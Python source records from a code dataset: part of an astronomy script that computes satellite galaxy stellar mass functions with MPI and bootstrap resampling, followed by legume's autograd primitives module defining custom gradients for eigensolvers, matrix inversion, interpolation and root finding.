cat_neighbors_rand[cat_neighbors_rand['MASS_MED'] < masscut_high]\n\n mass_neighbors_rand = cat_neighbors_rand['MASS_MED']\n if len(mass_neighbors_rand) != 0:\n if ssfq == 'all':\n sfq_weights_rand = np.ones(len(mass_neighbors_rand))\n elif ssfq == 'ssf':\n sfq_weights_rand = cat_neighbors_rand['sfProb_nuvrk']\n else:\n sfq_weights_rand = 1 - cat_neighbors_rand['sfProb_nuvrk']\n\n weights = np.array(sfq_weights_rand / completeness_est(mass_neighbors_rand, cat_neighbors_rand['sfProb_nuvrk'], z))\n if not rel_scale:\n counts_gals_rand = np.histogram(mass_neighbors_rand, weights=weights, bins=bin_edges)[0]\n else:\n rel_mass_neighbors_rand = mass_neighbors_rand - mass_cen\n counts_gals_rand = np.histogram(rel_mass_neighbors_rand, weights=weights, bins=rel_bin_edges)[0]\n\n else:\n counts_gals_rand += np.zeros(bin_number)\n\n return counts_gals_rand, flag_bkg2\n\n\ndef correct_for_masked_area(ra, dec):\n # correct area for normalization if it is partially in masked region\n if not correct_masked:\n return np.ones(bin_number), np.ones(bin_number)\n else:\n cat_nomask = cat_random_nomask[abs(cat_random_nomask['RA'] - ra) < r_iso / dis / np.pi * 180]\n cat_nomask = cat_nomask[abs(cat_nomask['DEC'] - dec) < r_iso / dis / np.pi * 180]\n cat_nomask = cat_nomask[SkyCoord(cat_nomask['RA'] * u.deg, cat_nomask['DEC'] * u.deg).separation\n (SkyCoord(ra * u.deg, dec * u.deg)).degree < r_iso / dis / np.pi * 180]\n\n cat_mask = cat_random[abs(cat_random['RA'] - ra) < r_iso / dis / np.pi * 180]\n cat_mask = cat_mask[abs(cat_mask['DEC'] - dec) < r_iso / dis / np.pi * 180]\n cat_mask = cat_mask[SkyCoord(cat_mask['RA'] * u.deg, cat_mask['DEC'] * u.deg).separation\n (SkyCoord(ra * u.deg, dec * u.deg)).degree < r_iso / dis / np.pi * 180]\n\n if len(cat_nomask) == 0:\n return np.zeros(bin_number), np.zeros(bin_number)\n else:\n coord = SkyCoord(ra * u.deg, dec * u.deg)\n coord_nomask = SkyCoord(cat_nomask['RA'] * u.deg, cat_nomask['DEC'] * u.deg)\n radius_list_nomask = coord_nomask.separation(coord).degree / 180. 
* np.pi * dis * 1000\n count_nomask = np.histogram(radius_list_nomask, bins=bin_edges)[0]\n count_nomask = np.array(count_nomask).astype(float)\n if len(cat_mask) == 0:\n count_mask = np.zeros(bin_number)\n else:\n coord_mask = SkyCoord(cat_mask['RA'] * u.deg, cat_mask['DEC'] * u.deg)\n radius_list_mask = coord_mask.separation(coord).degree / 180. * np.pi * dis * 1000\n count_mask = np.histogram(radius_list_mask, bins=bin_edges)[0]\n count_mask = np.array(count_mask).astype(float)\n\n return count_mask, count_nomask\n\n\ndef cut_random_cat(cat_rand, coord_list):\n # cut random point catalog to avoid overlapping\n add_to_random_points(coord_list)\n for coord in coord_list:\n coord_rand_list = SkyCoord(cat_rand['RA'] * u.deg, cat_rand['DEC'] * u.deg)\n cat_rand = cat_rand[coord_rand_list.separation(coord).degree > r_iso * 2 / dis / np.pi * 180]\n return cat_rand\n\n\ndef add_to_random_points(coord_list):\n # store coord of selected random points just for record\n for coord in coord_list:\n cat_random_points.add_row([coord.ra.value, coord.dec.value, gal['NUMBER']])\n\n return 0\n\n\ndef completeness_est(mass_list, sfProb_list, z):\n try:\n completeness_sf = np.genfromtxt('../mass_completeness_data/allFields_' + str(round(z - 0.1, 1)) + '_z_' + str(round(z + 0.1,1)) + '_sf_nopert_nan.txt')\n completeness_q = np.genfromtxt('../mass_completeness_data/allFields_' + str(round(z - 0.1, 1)) + '_z_' + str(round(z + 0.1,1)) + '_q_nopert_nan.txt')\n completeness = np.array([])\n for idx in range(len(mass_list)):\n if sfProb_list[idx] > 0.5:\n completeness = np.append(completeness, np.interp(mass_list[idx], completeness_sf[0], completeness_sf[3]))\n else:\n completeness = np.append(completeness, np.interp(mass_list[idx], completeness_q[0], completeness_q[3]))\n\n completeness[np.isnan(completeness)] = 1.\n return completeness\n except:\n return np.ones(len(mass_list))\n\n\ndef scatter():\n # randomize redshift and mass for bootstrapping\n z_scatter = np.random.normal(cat_gal[zkeyname], 0.044 * (cat_gal[zkeyname] + 1)) # photoz scatter\n #mass_scatter = np.log10(abs(np.random.normal(10 ** (cat_gal['MASS_MED'] - 10),\n # (cat_gal['MASS_SUP'] - cat_gal['MASS_INF'])/2 * 10 ** (cat_gal['MASS_MED'] - 10)))) + 10 # mass scatter\n\n #cat_gal['MASS_MED'] = mass_scatter\n cat_gal[zkeyname] = z_scatter\n\n# multi-threading settings\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nnProcs = comm.Get_size()\n# ################# START #####################\nall_z = False\ncorrect_masked = True\nsave_results = True\nsave_catalogs = False\nrel_scale = False\nmasscut_low = 7.0\nmasscut_high = 13.0\nmasscut_host = 11.15\nr_iso = 0.7 # Mpc (isolation criteria radius)\nr_high = 0.7 # Mpc\nr_low = 0.0 # Mpc\nsat_z_cut = 4.5\ncsfq = 'all' # csf, cq, all\nssfq = sys.argv[1]\nboot_num = 2\nzkeyname = 'ZPHOT'\n\n# main loop\nz = eval(sys.argv[2])\nz_bin_size = 0.1\nbin_number = 20\nbin_edges = np.linspace(masscut_low , masscut_high, num=bin_number+1)\nrel_bin_edges = np.linspace(-4, 0, num=bin_number+1)\n\ncatalog_path = '/home/lejay/catalogs/'\npath = '/home/lejay/test_smf/test_smf_new_cat/'\nif path[-1] != '/' and save_results:\n raise NameError('path is not a directory!')\nelif save_results:\n print('will save results to ' + path)\n if not os.path.exists(path):\n os.system('mkdir '+path)\nelse:\n print('will NOT save results!')\n\n# distribute data and collect results\nif rank == 0:\n print('radius range:', r_low, r_high, 'sat_z_cut:', sat_z_cut)\n print('csfq =', csfq, 'ssfq =', ssfq, masscut_low, masscut_high)\n\n # set job 
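The rank-0 block in this script hands one field name to each worker and then collects results with `MPI.ANY_SOURCE`; stripped of the science, the skeleton is the sketch below (run under e.g. `mpiexec -n 5 python script.py`; the per-worker computation is a stand-in):

```python
from mpi4py import MPI

comm = MPI.COMM_WORLD
rank = comm.Get_rank()

if rank == 0:
    jobs = ['COSMOS_deep', 'ELAIS_deep', 'XMM-LSS_deep', 'DEEP_deep']
    for proc in range(1, comm.Get_size()):
        comm.send(jobs[proc - 1], dest=proc)
    # Collect one result per worker, in whatever order they finish.
    results = [comm.recv(source=MPI.ANY_SOURCE)
               for _ in range(1, comm.Get_size())]
    print(results)
else:
    job = comm.recv(source=0)
    comm.send(len(job), dest=0)  # stand-in for the per-field computation
```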
distribution\n cat_names = ['COSMOS_deep', 'ELAIS_deep', 'XMM-LSS_deep', 'DEEP_deep']\n if nProcs == len(cat_names)+1:\n for Proc in range(1, nProcs):\n comm.send(cat_names[Proc-1], dest=Proc)\n\n # stand-by to collect results\n smf_dist_tot = np.zeros(bin_number)\n smf_dist_bkg_tot = np.zeros(bin_number)\n smf_dist_sat_tot = np.zeros(bin_number)\n smf_dist_inf_tot = np.zeros(bin_number)\n smf_dist_bkg_inf_tot = np.zeros(bin_number)\n smf_dist_sat_inf_tot = np.zeros(bin_number)\n smf_dist_sup_tot = np.zeros(bin_number)\n smf_dist_bkg_sup_tot = np.zeros(bin_number)\n smf_dist_sat_sup_tot = np.zeros(bin_number)\n mass_cens_tot = []\n isolated_counts_tot = 0\n bkg_counts_tot = 0\n for i in range(1, nProcs):\n smf_dist, smf_dist_bkg, smf_dist_sat, mass_cens, isolated_counts, bkg_counts = comm.recv(source=MPI.ANY_SOURCE)\n\n smf_dist_tot += smf_dist[0]\n smf_dist_bkg_tot += smf_dist_bkg[0]\n smf_dist_sat_tot += smf_dist_sat[0]\n\n smf_dist_inf_tot += smf_dist[1]\n smf_dist_bkg_inf_tot += smf_dist_bkg[1]\n smf_dist_sat_inf_tot += smf_dist_sat[1]\n\n smf_dist_sup_tot += smf_dist[2]\n smf_dist_bkg_sup_tot += smf_dist_bkg[2]\n smf_dist_sat_sup_tot += smf_dist_sat[2]\n\n mass_cens_tot += mass_cens # addition of two lists (append)\n isolated_counts_tot += isolated_counts\n bkg_counts_tot += bkg_counts\n\n # output result to file\n print(round(sum(smf_dist_tot)), round(sum(smf_dist_bkg_tot)), round(sum(smf_dist_sat_tot)))\n smf_dist_cen_tot = np.histogram(mass_cens_tot, bins=bin_edges)[0]\n if len(mass_cens_tot) == isolated_counts_tot and save_results:\n filename = path + 'smf_' + str(r_low) + '_'+str(r_high) + '_' + str(masscut_low) + '_' + str(csfq) + '_' + str(ssfq) + '_' + str(round(z, 1))\n print(filename)\n\n np.save(filename + '_total', [smf_dist_tot, smf_dist_inf_tot, smf_dist_sup_tot, isolated_counts_tot])\n np.save(filename + '_bkg', [smf_dist_bkg_tot, smf_dist_bkg_inf_tot, smf_dist_bkg_sup_tot, isolated_counts_tot])\n np.save(filename + '_sat', [smf_dist_sat_tot, smf_dist_sat_inf_tot, smf_dist_sat_sup_tot, isolated_counts_tot])\n\n if not rel_scale:\n np.save(path + 'bin_edges', bin_edges)\n np.save(filename + '_cen', [smf_dist_cen_tot, isolated_counts_tot])\n else:\n np.save(path + 'bin_edges', rel_bin_edges)\n\n print('total number', round(sum(smf_dist_tot)))\n print('total number in bkg', round(sum(smf_dist_bkg_tot)))\n print('massive counts:', isolated_counts_tot)\n elif not save_results:\n print('isolated counts', isolated_counts_tot,'bkg counts', bkg_counts_tot)\n else:\n print(len(mass_cens_tot), isolated_counts_tot, 'Warning: wrong numbers! 
(Results not saved)')\n\n# calculations\nelse:\n cat_name = comm.recv(source=MPI.ANY_SOURCE)\n cat_gal = Table.read(catalog_path + 'v9_cats/'+cat_name+'_v9_gal_cut_params_sfq_added.fits') # read-in\n cat_gal = cat_gal[~np.isnan(cat_gal[zkeyname])]\n cat_gal = cat_gal[cat_gal[zkeyname] < 1.3]\n if cat_name == 'XMM-LSS_deep':\n cat_gal = cat_gal[cat_gal['inside_uS'] == True]\n else:\n cat_gal = cat_gal[cat_gal['inside_u'] == True]\n if 'inside_j' in path:\n cat = cat_gal[cat_gal['inside_j'] == True]\n cat_gal = cat_gal[cat_gal['MASK'] == 0] # unmasked\n cat_gal = cat_gal[cat_gal['OBJ_TYPE'] == 0] # galaxies\n cat_gal = cat_gal[cat_gal['MASS_MED'] > masscut_low]\n\n cat_random_points = Table(names=('RA', 'DEC', 'GAL_ID')) # to store position of selected random apertures\n print('=========rank=' + str(rank) + '======z=' + str(round(z, 1)) + '=========='+cat_name+'===')\n\n # bootstrap resampling\n smf_dist_arr = np.zeros(bin_number)\n smf_dist_bkg_arr = np.zeros(bin_number)\n mass_key_ori = cat_gal['MASS_MED'].copy()\n z_key_ori = cat_gal[zkeyname].copy()\n mass_centrals_ori = []\n isolated_counts_ori = 0\n count_bkg_ori = 0\n for boot_iter in range(boot_num):\n if boot_iter != 0:\n cat_gal['MASS_MED'] = mass_key_ori\n cat_gal[zkeyname] = z_key_ori\n scatter()\n boot_idx = bootstrap(np.arange(len(cat_gal)), bootnum=1)\n cat_gal_copy = cat_gal[boot_idx[0].astype(int)]\n else:\n cat_gal_copy = cat_gal\n\n # select massive galaxies\n cat_massive_gal = cat_gal_copy[cat_gal_copy['MASS_MED'] > masscut_host]\n cat_massive_z_slice = cat_massive_gal[abs(cat_massive_gal[zkeyname] - z) < z_bin_size]\n coord_massive_gal = SkyCoord(cat_massive_z_slice['RA'] * u.deg, cat_massive_z_slice['DEC'] * u.deg)\n\n # read in random point catalog\n cat_random = Table.read('/home/lejay/random_point_cat/' + cat_name + '_random_point.fits')\n cat_random = cat_random[cat_random['inside'] == 0]\n cat_random_nomask = np.copy(cat_random)\n cat_random = cat_random[cat_random['MASK'] != 0]\n cat_random_copy = np.copy(cat_random) # reset random points catalog at each redshift\n\n cat_random_points = Table(names=('RA', 'DEC', 'GAL_ID')) # to store position of selected random apertures\n isolated_counts = 0\n smf_dist = np.zeros(bin_number)\n smf_dist_bkg = np.zeros(bin_number)\n mass_centrals = []\n count_bkg = 0\n massive_count = 0\n print('massive gals:', len(cat_massive_z_slice))\n for gal in cat_massive_z_slice: # [np.random.randint(len(cat_massive_z_slice), size=300)]:\n massive_count += 1\n dis = WMAP9.angular_diameter_distance(gal[zkeyname]).value\n coord_gal = SkyCoord(gal['RA'] * u.deg, gal['DEC'] * u.deg)\n\n # prepare neighbors catalog\n cat_neighbors_z_slice = cat_gal_copy[abs(cat_gal_copy[zkeyname] - gal[zkeyname]) < sat_z_cut * 0.044 * (1 + gal[zkeyname])]\n cat_neighbors = cat_neighbors_z_slice[abs(cat_neighbors_z_slice['RA'] - gal['RA']) < r_iso / dis / np.pi * 180]\n cat_neighbors = cat_neighbors[abs(cat_neighbors['DEC'] - gal['DEC']) < r_iso / dis / np.pi * 180]\n\n # #### spatial selection\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n\n else:\n # choose sats within r_high\n coord_neighbors = SkyCoord(cat_neighbors['RA'] * u.deg, cat_neighbors['DEC'] * u.deg)\n cat_neighbors = cat_neighbors[coord_neighbors.separation(coord_gal).degree < r_iso / dis / np.pi * 180]\n cat_neighbors = cat_neighbors[cat_neighbors['NUMBER'] != gal['NUMBER']]\n\n # isolation cut on central\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n elif gal['MASS_MED'] < 
max(cat_neighbors['MASS_MED']): # no more-massive companions\n continue\n\n # choose sats within r_high\n coord_neighbors = SkyCoord(cat_neighbors['RA'] * u.deg, cat_neighbors['DEC'] * u.deg)\n cat_neighbors = cat_neighbors[coord_neighbors.separation(coord_gal).degree < r_high / dis / np.pi * 180]\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n\n # exclude sats within r_low\n coord_neighbors = SkyCoord(cat_neighbors['RA'] * u.deg, cat_neighbors['DEC'] * u.deg)\n cat_neighbors = cat_neighbors[coord_neighbors.separation(coord_gal).degree > r_low / dis / np.pi * 180]\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n\n # cut on central SF/Q\n if csfq == 'csf' and gal['sfProb_nuvrk'] < 0.5:\n continue\n elif csfq == 'cq' and gal['sfProb_nuvrk'] >= 0.5:\n continue\n\n # cut on companion sample (cut the final sample)\n cat_neighbors = cat_neighbors[cat_neighbors['MASS_MED'] > masscut_low]\n cat_neighbors = cat_neighbors[cat_neighbors['MASS_MED'] < masscut_high]\n mass_neighbors = cat_neighbors['MASS_MED']\n if len(cat_neighbors) == 0: # central gals which has no companion\n continue\n\n # Core Function: statistics #\n isolated_counts += 1\n mass_centrals.append(gal['MASS_MED'])\n if ssfq == 'all':\n sfq_weights = np.ones(len(cat_neighbors))\n elif ssfq == 'ssf':\n sfq_weights = cat_neighbors['sfProb_nuvrk']\n else:\n sfq_weights = 1 - cat_neighbors['sfProb_nuvrk']\n\n # absolute / relative mass scale\n sat_weights = np.array(sfq_weights/completeness_est(mass_neighbors, cat_neighbors['sfProb_nuvrk'], z))\n if not rel_scale:\n count_binned = np.histogram(mass_neighbors, weights=sat_weights, bins=bin_edges)[0]\n else:\n rel_mass_neighbors = mass_neighbors - gal['MASS_MED']\n count_binned = np.histogram(rel_mass_neighbors, weights=sat_weights, bins=rel_bin_edges)[0]\n\n sat_counts = np.array(count_binned, dtype='f8')\n smf_dist += sat_counts\n\n coord_random_list, sat_bkg, flag_bkg = bkg(cat_neighbors_z_slice, coord_massive_gal, gal['MASS_MED'])\n if flag_bkg == 0:\n cat_random = cut_random_cat(cat_random, coord_random_list)\n # sat_bkg, flag_bkg = bkg_2(cat_neighbors_z_slice, coord_massive_gal, gal['MASS_MED'])\n smf_dist_bkg += sat_bkg\n count_bkg += 1\n else:\n flag_bkg = 0\n\n # add results from this bootstrap iteration\n smf_dist_bkg = smf_dist_bkg / float(count_bkg) * isolated_counts\n smf_dist_arr = np.vstack((smf_dist_arr, smf_dist))\n smf_dist_bkg_arr = np.vstack((smf_dist_bkg_arr, smf_dist_bkg))\n if boot_iter == 0:\n mass_centrals_ori = mass_centrals\n isolated_counts_ori = isolated_counts\n count_bkg_ori = count_bkg\n\n # combine bootstrap results and calculate error\n smf_dist_arr = smf_dist_arr[1:]\n smf_dist_bkg_arr = smf_dist_bkg_arr[1:]\n smf_dist_sat_arr = smf_dist_arr - smf_dist_bkg_arr\n\n smf_dist_avg = np.average(smf_dist_arr, axis=0)\n smf_dist_bkg_avg = np.average(smf_dist_bkg_arr, axis=0)\n smf_dist_sat_avg = np.average(smf_dist_sat_arr, axis=0)\n\n smf_dist_inf = np.percentile(smf_dist_arr, 16, axis=0)\n smf_dist_bkg_inf = np.percentile(smf_dist_bkg_arr, 16, axis=0)\n smf_dist_sat_inf = np.percentile(smf_dist_sat_arr, 16, axis=0)\n\n smf_dist_sup = np.percentile(smf_dist_arr, 84, axis=0)\n smf_dist_bkg_sup = np.percentile(smf_dist_bkg_arr, 84, axis=0)\n smf_dist_sat_sup = np.percentile(smf_dist_sat_arr, 84, axis=0)\n\n smf_dist_avg_error = [smf_dist_avg, smf_dist_inf, smf_dist_sup]\n smf_dist_bkg_avg_error = [smf_dist_bkg_avg, smf_dist_bkg_inf, smf_dist_bkg_sup]\n smf_dist_sat_avg_error = [smf_dist_sat_avg, 
smf_dist_sat_inf, smf_dist_sat_sup]\n\n # cat_random_points.write('smf_random_points_' + cat_name + '_' + str(z) + '.fits', overwrite=True)\n comm.send((smf_dist_avg_error, smf_dist_bkg_avg_error, smf_dist_sat_avg_error, mass_centrals_ori, isolated_counts_ori, count_bkg_ori), dest=0)","repo_name":"LejayChen/massive_gals","sub_path":"CUT_deep_catalogs/test_smf/smf_deep_layer_cloud.py","file_name":"smf_deep_layer_cloud.py","file_ext":"py","file_size_in_byte":22823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3206478342","text":"import numpy as np\nimport scipy.sparse as sp\nfrom functools import partial\nfrom .utils import toeplitz_block, get_value, fsolve, extend\n\nfrom autograd.extend import primitive, defvjp, vspace\nfrom autograd import grad, vector_jacobian_product\nimport autograd.numpy as npa\n\"\"\" Define here various primitives needed for the main code \nTo use with both numpy and autograd backends, define the autograd primitive of \na numpy function fnc as fnc_ag, and then define the vjp\"\"\"\n\n\ndef T(x):\n return np.swapaxes(x, -1, -2)\n\n\n\"\"\"=========== EXPAND ARRAY TO A GIVEN SHAPE =========== \"\"\"\n\n# extend(vals, inds, shape) makes an array of shape `shape` where indices\n# `inds` have values `vals`\nextend_ag = primitive(extend)\n\n\ndef vjp_maker_extend(ans, vals, inds, shape):\n def vjp(g):\n return g[inds]\n\n return vjp\n\n\ndefvjp(extend_ag, vjp_maker_extend, None, None)\n\"\"\"=========== NP.SQRT STABLE AROUND 0 =========== \"\"\"\nsqrt_ag = primitive(np.sqrt)\n\n\ndef vjp_maker_sqrt(ans, x):\n def vjp(g):\n return g * 0.5 * (x + 1e-10)**0.5 / (x + 1e-10)\n # return np.where(np.abs(x) > 1e-10, g * 0.5 * x**-0.5, 0.)\n\n return vjp\n\n\ndefvjp(sqrt_ag, vjp_maker_sqrt)\n\"\"\"=========== TOEPLITZ-BLOCK =========== \"\"\"\n\ntoeplitz_block_ag = primitive(toeplitz_block)\n\n\ndef vjp_maker_TB_T1(Tmat, n, T1, T2):\n \"\"\" Gives vjp for Tmat = toeplitz_block(n, T1, T2) w.r.t. T1\"\"\"\n def vjp(v):\n ntot = Tmat.shape[0]\n p = int(ntot / n) # Linear size of each block\n vjac = np.zeros(T1.shape, dtype=np.complex128)\n\n for ind1 in range(n):\n for ind2 in range(ind1, n):\n for indp in range(p):\n vjac[(ind2-ind1)*p:(ind2-ind1+1)*p-indp] += \\\n v[ind1*p + indp, ind2*p+indp:(ind2+1)*p]\n\n if ind2 > ind1:\n vjac[(ind2-ind1)*p:(ind2-ind1+1)*p-indp] += \\\n np.conj(v[ind2*p+indp:(ind2+1)*p, ind1*p + indp])\n return vjac\n\n return vjp\n\n\ndef vjp_maker_TB_T2(Tmat, n, T1, T2):\n \"\"\" Gives vjp for Tmat = toeplitz_block(n, T1, T2) w.r.t. T2\"\"\"\n def vjp(v):\n ntot = Tmat.shape[0]\n p = int(ntot / n) # Linear size of each block\n vjac = np.zeros(T2.shape, dtype=np.complex128)\n\n for ind1 in range(n):\n for ind2 in range(ind1, n):\n for indp in range(p):\n vjac[(ind2-ind1)*p+1:(ind2-ind1+1)*p-indp] += \\\n v[ind1*p+indp+1:(ind1+1)*p, ind2*p+indp]\n\n if ind2 > ind1:\n vjac[(ind2-ind1)*p+1:(ind2-ind1+1)*p-indp] += \\\n np.conj(v[ind2*p+indp, ind1*p+indp+1:(ind1+1)*p])\n return vjac\n\n return vjp\n\n\ndefvjp(toeplitz_block_ag, None, vjp_maker_TB_T1, vjp_maker_TB_T2)\n\"\"\"=========== NUMPY.LINALG.EIGH =========== \"\"\"\n\neigh_ag = primitive(np.linalg.eigh)\n\n\ndef vjp_maker_eigh(ans, x, UPLO='L'):\n \"\"\"Gradient for eigenvalues and vectors of a hermitian matrix.\"\"\"\n N = x.shape[-1]\n w, v = ans # Eigenvalues, eigenvectors.\n vc = np.conj(v)\n\n def vjp(g):\n wg, vg = g # Gradient w.r.t. 
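The error bars above come from the 16th/84th percentiles of the bootstrap realizations, i.e. a central 68% interval around the bootstrap average. Separated from the science, the construction is just (toy data, sizes illustrative):

```python
import numpy as np

rng = np.random.default_rng(0)
boot = rng.poisson(lam=20, size=(100, 5))  # 100 bootstrap draws, 5 bins

avg = np.average(boot, axis=0)
lo = np.percentile(boot, 16, axis=0)  # analogous to smf_dist_inf above
hi = np.percentile(boot, 84, axis=0)  # analogous to smf_dist_sup above
print(avg, lo, hi)  # [lo, hi] brackets the central 68% in each bin
```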
eigenvalues, eigenvectors.\n w_repeated = np.repeat(w[:, np.newaxis], N, axis=-1)\n\n # Eigenvalue part\n vjp_temp = np.dot(vc * wg[np.newaxis, :], T(v))\n\n # Add eigenvector part only if non-zero backward signal is present.\n # This can avoid NaN results for degenerate cases if the function\n # depends on the eigenvalues only.\n if np.any(vg):\n off_diag = np.ones((N, N)) - np.eye(N)\n F = off_diag / (T(w_repeated) - w_repeated + np.eye(N))\n vjp_temp += np.dot(np.dot(vc, F * np.dot(T(v), vg)), T(v))\n\n # eigh always uses only the lower or the upper part of the matrix\n # we also have to make sure broadcasting works\n reps = np.array(x.shape)\n reps[-2:] = 1\n\n if UPLO == 'L':\n tri = np.tile(np.tril(np.ones(N), -1), reps)\n elif UPLO == 'U':\n tri = np.tile(np.triu(np.ones(N), 1), reps)\n\n return np.real(vjp_temp)*np.eye(vjp_temp.shape[-1]) + \\\n (vjp_temp + np.conj(T(vjp_temp))) * tri\n\n return vjp\n\n\ndefvjp(eigh_ag, vjp_maker_eigh)\n\"\"\"=========== MATRIX INVERSE =========== \"\"\"\n\"\"\"We define this here without the `einsum` notation that's used in autograd.\n`einsum` allows broadcasting (which we don't care about), but is slower \n(which we do)\n\"\"\"\n\ninv_ag = primitive(np.linalg.inv)\n\n\ndef vjp_maker_inv(ans, x):\n return lambda g: -np.dot(np.dot(T(ans), g), T(ans))\n\n\ndefvjp(inv_ag, vjp_maker_inv)\n\"\"\"=========== SCIPY.SPARSE.LINALG.EIGSH =========== \"\"\"\n\neigsh_ag = primitive(sp.linalg.eigsh)\n\n# def vjp_maker_eigsh(ans, x, **kwargs):\n# \"\"\"Gradient for eigenvalues and vectors of a hermitian matrix.\"\"\"\n# numeig = kwargs['k']\n# N = x.shape[-1]\n# w, v = ans # Eigenvalues, eigenvectors.\n# vc = np.conj(v)\n\n# def vjp(g):\n# wg, vg = g # Gradient w.r.t. eigenvalues, eigenvectors.\n# w_repeated = np.repeat(w[..., np.newaxis], numeig, axis=-1)\n\n# # Eigenvalue part\n# vjp_temp = np.dot(vc * wg[..., np.newaxis, :], T(v))\n\n# # Add eigenvector part only if non-zero backward signal is present.\n# # This can avoid NaN results for degenerate cases if the function\n# # depends on the eigenvalues only.\n# if np.any(vg):\n# off_diag = np.ones((numeig, numeig)) - np.eye(numeig)\n# F = off_diag / (T(w_repeated) - w_repeated + np.eye(numeig))\n# vjp_temp += np.dot(np.dot(vc, F * np.dot(T(v), vg)), T(v))\n\n# return vjp_temp\n\n# return vjp\n\n\ndef vjp_maker_eigsh(ans, mat, **kwargs):\n \"\"\"Steven Johnson method extended to a Hermitian matrix\n https://math.mit.edu/~stevenj/18.336/adjoint.pdf\n \"\"\"\n numeig = kwargs['k']\n N = mat.shape[0]\n\n def vjp(g):\n vjp_temp = np.zeros_like(mat)\n for iv in range(numeig):\n a = ans[0][iv]\n v = ans[1][:, iv]\n vc = np.conj(v)\n ag = g[0][iv]\n vg = g[1][:, iv]\n\n # Eigenvalue part\n vjp_temp += ag * np.outer(vc, v)\n\n # Add eigenvector part only if non-zero backward signal is present.\n # This can avoid NaN results for degenerate cases if the function\n # depends on the eigenvalues only.\n if np.any(vg):\n # Projection operator on space orthogonal to v\n P = np.eye(N, N) - np.outer(vc, v)\n Amat = T(mat - a * np.eye(N, N))\n b = P.dot(vg)\n\n # Initial guess orthogonal to v\n v0 = P.dot(np.random.randn(N))\n\n # Find a solution lambda_0 using conjugate gradient\n (l0, _) = sp.linalg.cg(Amat, b, x0=v0, atol=0)\n # Project to correct for round-off errors\n l0 = P.dot(l0)\n\n vjp_temp -= np.outer(l0, v)\n\n return vjp_temp\n\n return vjp\n\n\ndefvjp(eigsh_ag, vjp_maker_eigsh)\n\"\"\"=========== NUMPY.INTERP =========== \"\"\"\n\"\"\"This implementation might not be covering the full scope of the 
numpy.interp\nfunction, but it covers everything we need\n\"\"\"\n\ninterp_ag = primitive(np.interp)\n\n\ndef vjp_maker_interp(ans, x, xp, yp):\n \"\"\"Construct the vjp of interp(x, xp, yp) w.r.t. yp\n \"\"\"\n def vjp(g):\n dydyp = np.zeros((x.size, xp.size))\n for ix in range(x.size):\n indx = np.searchsorted(xp, x[ix]) - 1\n dydyp[ix,\n indx] = 1 - (x[ix] - xp[indx]) / (xp[indx + 1] - xp[indx])\n dydyp[ix,\n indx + 1] = (x[ix] - xp[indx]) / (xp[indx + 1] - xp[indx])\n return np.dot(g, dydyp)\n\n return vjp\n\n\ndefvjp(interp_ag, None, None, vjp_maker_interp)\n\"\"\"=========== SOLVE OF f(x, y) = 0 W.R.T. X =========== \"\"\"\nfsolve_ag = primitive(fsolve)\n\"\"\"fsolve_ag(fun, lb, ub, *args) solves fun(x, *args) = 0 for lb <= x <= ub\n x and the output of fun are both scalar\n args can be anything\n\"\"\"\n\n\ndef vjp_factory_fsolve(ginds):\n \"\"\"\n Factory function defining the vjp_makers for a generic fsolve_ag with \n multiple extra arguments\n\n Output: a list of vjp_makers for backproping through dx/darg where x is \n found through fsolve_ag and arg is one of the function args. \n Input: \n - ginds : Boolean list defining which args will be differentiated.\n grad(f, gind) must exist for all gind==True in ginds\n grad(f, 0), i.e. the gradient w.r.t. x, must also exist\n \"\"\"\n\n # Gradients w.r.t fun, lb and ub are not computed\n vjp_makers = [None, None, None]\n\n def vjp_single_arg(ia):\n def vjp_maker(ans, *args):\n f = args[0]\n fargs = args[3:]\n dfdx = grad(f, 0)(ans, *fargs)\n dfdy = grad(f, ia + 1)(ans, *fargs)\n\n def vjp(g):\n return np.dot(g, -1 / dfdx * dfdy)\n\n return vjp\n\n return vjp_maker\n\n for (ia, gind) in enumerate(ginds):\n if gind == True:\n vjp_makers.append(vjp_single_arg(ia=ia))\n else:\n vjp_makers.append(None)\n\n return tuple(vjp_makers)\n\n\n# NB: This definition is for the specific fsolve with three arguments\n# used for the guided modes!!!\ndefvjp(fsolve_ag, *vjp_factory_fsolve([False, True, True]))\n\"\"\"=========== MAP FUNCTION EVALUATION =========== \"\"\"\n\"\"\" A variation of the `functools.map` function applied to a list of functions,\n defined as follows\n `fmap(fns, params) = map(lambda f: f(params), fns)`\n (the output is converted to a numpy array)\n\n We assume that each `f` in `fns` returns a scalar such that the output is an \n array of the same size as `fns`.\n\"\"\"\n\n\n@primitive\ndef fmap(fns, params):\n \"\"\" autograd-ready version of functools.fmap applied to a list of functions\n `fns` taking the same parmeters `params`\n Arguments:\n `fns`: list of functions of `params` that return a scalar\n `params`: array of parameters feeding into each individual computation\n Returns:\n Numpy array of same size as the `fns` list\n \"\"\"\n\n # use standard map function and convert to a Numpy array\n return np.array(list(map(lambda f: f(params), fns))).ravel()\n\n\ndef vjp_maker_fmap(ans, fns, params):\n # get the gradient of each function and stack along the 0-th dimension\n grads = np.stack(list(map(lambda f: grad(f)(params), fns)), axis=0)\n # this literally does the vector-jacobian product\n return lambda v: np.dot(v.T, grads)\n\n\ndefvjp(fmap, None, vjp_maker_fmap)\n","repo_name":"fancompute/legume","sub_path":"legume/primitives.py","file_name":"primitives.py","file_ext":"py","file_size_in_byte":10556,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"43"} +{"seq_id":"38893269172","text":"# 
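The `primitive`/`defvjp` pairs in this file all follow one shape: wrap the forward function, then register a maker that closes over the inputs and returns the vector-Jacobian product. A minimal end-to-end instance of the same pattern:

```python
from autograd import grad
from autograd.extend import primitive, defvjp

@primitive
def square(x):
    # Treated as a black box by autograd until a VJP is registered.
    return x * x

def vjp_maker_square(ans, x):
    # d(x*x)/dx = 2x, so the VJP scales the incoming cotangent by 2x.
    return lambda g: g * 2.0 * x

defvjp(square, vjp_maker_square)

print(grad(square)(3.0))  # 6.0
```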
